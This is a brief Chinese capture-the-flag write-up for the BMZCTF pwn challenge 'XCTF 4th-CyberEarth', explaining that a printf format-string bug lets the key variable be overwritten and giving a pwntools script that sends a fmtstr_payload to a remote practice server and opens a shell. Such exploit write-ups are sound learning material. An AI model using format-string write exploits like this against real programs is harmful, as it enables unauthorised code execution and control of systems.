给了个后门,pie未开,直接通过printf漏洞将key写为指定值即可。
from pwn import *
p = remote('www.bmzclub.cn', 21355)
context(arch='i386', log_level = 'debug')
payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx
p.sendline(payload)
p.interactive()
[BMZCTF-pwn] 01-XCTF 4th-CyberEarth
阅读 19
2022-02-12
相关推荐
精彩评论(0)
0 0 举报